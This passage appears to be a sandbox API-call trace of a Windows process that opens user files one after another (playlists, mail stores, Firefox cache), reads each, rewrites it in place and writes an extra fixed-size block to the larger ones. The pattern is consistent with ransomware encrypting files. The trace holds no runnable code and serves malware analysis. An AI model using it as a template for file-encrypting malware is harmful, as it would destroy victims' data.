ReadFile (in: hFile=0x210, lpBuffer=0x286daa8, nNumberOfBytesToRead=0x31d, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x286daa8*, lpNumberOfBytesRead=0x359f2bc*=0x31d, lpOverlapped=0x0) returned 1 [0166.064] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0166.064] WriteFile (in: hFile=0x210, lpBuffer=0x2840958*, nNumberOfBytesToWrite=0x8a5, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2840958*, lpNumberOfBytesWritten=0x359f2d0*=0x8a5, lpOverlapped=0x0) returned 1 [0166.064] CloseHandle (hObject=0x210) returned 1 [0166.065] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\01_Music_auto_rated_at_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\01_music_auto_rated_at_5_stars.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0166.065] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0166.066] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x414 [0166.066] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0166.066] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0166.066] ReleaseMutex (hMutex=0x168) returned 1 [0166.066] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="01_Music_auto_rated_at_5_stars.wpl", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0166.066] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="01_Music_auto_rated_at_5_stars.wpl", cchWideChar=34, lpMultiByteStr=0x1fa55f4, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="01_Music_auto_rated_at_5_stars.wpl", lpUsedDefaultChar=0x0) returned 34 [0166.066] ReadFile (in: hFile=0x210, lpBuffer=0x1e99d58, nNumberOfBytesToRead=0x414, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e99d58*, lpNumberOfBytesRead=0x359f2bc*=0x414, lpOverlapped=0x0) returned 1 [0166.069] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0166.069] WriteFile (in: hFile=0x210, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0x99c, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x359f2d0*=0x99c, lpOverlapped=0x0) returned 1 [0166.069] CloseHandle (hObject=0x210) returned 1 [0166.070] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\09_Music_played_the_most.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\09_music_played_the_most.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0166.071] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0166.071] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x401 [0166.071] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0166.071] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0166.072] ReleaseMutex (hMutex=0x168) returned 1 [0166.072] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="09_Music_played_the_most.wpl", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0166.072] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="09_Music_played_the_most.wpl", cchWideChar=28, lpMultiByteStr=0x1f8fc3c, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="09_Music_played_the_most.wpl", lpUsedDefaultChar=0x0) returned 28 [0166.072] ReadFile (in: hFile=0x210, lpBuffer=0x1e99d58, nNumberOfBytesToRead=0x401, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e99d58*, lpNumberOfBytesRead=0x359f2bc*=0x401, lpOverlapped=0x0) returned 1 [0166.074] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0166.075] WriteFile (in: hFile=0x210, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0x989, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x359f2d0*=0x989, lpOverlapped=0x0) returned 1 [0166.075] CloseHandle (hObject=0x210) returned 1 [0166.077] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio\\content14.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\visio\\content14.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0166.079] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0166.079] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x18ce0 [0166.079] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0166.079] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0166.079] ReleaseMutex (hMutex=0x168) returned 1 [0166.079] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="content14.dat", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0166.079] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="content14.dat", cchWideChar=13, lpMultiByteStr=0x1f735cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="content14.dat", lpUsedDefaultChar=0x0) returned 13 [0166.079] ReadFile (in: hFile=0x210, lpBuffer=0x286da88, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x286da88*, lpNumberOfBytesRead=0x359f278*=0x4000, lpOverlapped=0x0) returned 1 [0166.084] SetFilePointer (in: hFile=0x210, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x17ce0 [0166.084] ReadFile (in: hFile=0x210, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0166.085] SetFilePointer (in: hFile=0x210, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x17ce0 [0166.085] WriteFile (in: hFile=0x210, lpBuffer=0x2840938*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0166.086] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0166.086] WriteFile (in: hFile=0x210, lpBuffer=0x2840938*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesWritten=0x359f28c*=0x4000, lpOverlapped=0x0) returned 1 [0166.087] CloseHandle (hObject=0x210) returned 1 [0166.087] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00001.jrs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\edbres00001.jrs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0166.088] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0166.088] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x200000 [0166.088] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0166.088] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0166.089] ReleaseMutex (hMutex=0x168) returned 1 [0166.089] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="edbres00001.jrs", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0166.089] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="edbres00001.jrs", cchWideChar=15, lpMultiByteStr=0x1f7360c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="edbres00001.jrs", lpUsedDefaultChar=0x0) returned 15 [0166.089] ReadFile (in: hFile=0x210, lpBuffer=0x2840938, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0166.103] ReadFile (in: hFile=0x210, lpBuffer=0x2840938, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0166.104] SetFilePointer (in: hFile=0x210, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x1ff000 [0166.104] ReadFile (in: hFile=0x210, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0166.106] SetFilePointer (in: hFile=0x210, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x1ff000 [0166.107] WriteFile (in: hFile=0x210, lpBuffer=0x291d998*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x291d998*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0166.110] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0166.110] WriteFile (in: hFile=0x210, lpBuffer=0x29057d8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x29057d8*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0166.112] WriteFile (in: hFile=0x210, lpBuffer=0x29057d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x29057d8*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0166.112] CloseHandle (hObject=0x210) returned 1 [0166.112] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\peacock.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0166.113] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0166.113] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0xe8 [0166.113] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0166.113] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0166.114] ReleaseMutex (hMutex=0x168) returned 1 [0166.114] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Peacock.htm", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0166.114] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Peacock.htm", cchWideChar=11, lpMultiByteStr=0x1f735cc, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Peacock.htm", lpUsedDefaultChar=0x0) returned 11 [0166.114] ReadFile (in: hFile=0x210, lpBuffer=0x2697308, nNumberOfBytesToRead=0xe8, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2697308*, lpNumberOfBytesRead=0x359f2bc*=0xe8, lpOverlapped=0x0) returned 1 [0166.115] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0166.115] WriteFile (in: hFile=0x210, lpBuffer=0x2663f68*, nNumberOfBytesToWrite=0x670, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2663f68*, lpNumberOfBytesWritten=0x359f2d0*=0x670, lpOverlapped=0x0) returned 1 [0166.115] CloseHandle (hObject=0x210) returned 1 [0166.116] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\A8\\C3B7Bd01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\0\\a8\\c3b7bd01"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0166.117] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0166.117] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x4898 [0166.117] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0166.117] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0166.117] ReleaseMutex (hMutex=0x168) returned 1 [0166.117] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C3B7Bd01", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0166.118] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C3B7Bd01", cchWideChar=8, lpMultiByteStr=0x1f732cc, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C3B7Bd01", lpUsedDefaultChar=0x0) returned 8 [0166.118] ReadFile (in: hFile=0x210, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0166.119] SetFilePointer (in: hFile=0x210, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x3898 [0166.120] ReadFile (in: hFile=0x210, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0166.120] SetFilePointer (in: hFile=0x210, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x3898 [0166.121] WriteFile (in: hFile=0x210, lpBuffer=0x286fab8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x286fab8*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0166.121] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0166.121] WriteFile (in: hFile=0x210, lpBuffer=0x26ae978*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0166.121] CloseHandle (hObject=0x210) returned 1 [0166.122] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\E0\\F17B2d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\e0\\f17b2d01"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0166.123] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0166.123] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x404f [0166.123] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0166.123] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0166.123] ReleaseMutex (hMutex=0x168) returned 1 [0166.124] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="F17B2d01", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0166.124] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="F17B2d01", cchWideChar=8, lpMultiByteStr=0x1f7356c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="F17B2d01", lpUsedDefaultChar=0x0) returned 8 [0166.124] ReadFile (in: hFile=0x210, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0166.129] SetFilePointer (in: hFile=0x210, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x304f [0166.129] ReadFile (in: hFile=0x210, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0166.130] SetFilePointer (in: hFile=0x210, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x304f [0166.130] WriteFile (in: hFile=0x210, lpBuffer=0x286da88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x286da88*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0166.130] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0166.130] WriteFile (in: hFile=0x210, lpBuffer=0x26ae978*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0166.131] CloseHandle (hObject=0x210) returned 1 [0166.131] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_003_" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\_cache_003_"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0166.133] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0166.133] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x400000 [0166.133] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0166.133] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0166.133] ReleaseMutex (hMutex=0x168) returned 1 [0166.133] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="_CACHE_003_", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0166.134] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="_CACHE_003_", cchWideChar=11, lpMultiByteStr=0x1f732cc, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="_CACHE_003_", lpUsedDefaultChar=0x0) returned 11 [0166.134] ReadFile (in: hFile=0x210, lpBuffer=0x2840938, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0167.516] ReadFile (in: hFile=0x210, lpBuffer=0x2840938, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0167.518] ReadFile (in: hFile=0x210, lpBuffer=0x2840938, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesRead=0x359f278*=0x2000, lpOverlapped=0x0) returned 1 [0167.558] SetFilePointer (in: hFile=0x210, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x3fe000 [0167.558] ReadFile (in: hFile=0x210, lpBuffer=0x25ac1d8, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25ac1d8*, lpNumberOfBytesRead=0x359f278*=0x2000, lpOverlapped=0x0) returned 1 [0167.559] SetFilePointer (in: hFile=0x210, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x3fe000 [0167.560] WriteFile (in: hFile=0x210, lpBuffer=0x25ac1d8*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25ac1d8*, lpNumberOfBytesWritten=0x359f28c*=0x2588, lpOverlapped=0x0) returned 1 [0172.712] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0172.712] WriteFile (in: hFile=0x210, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 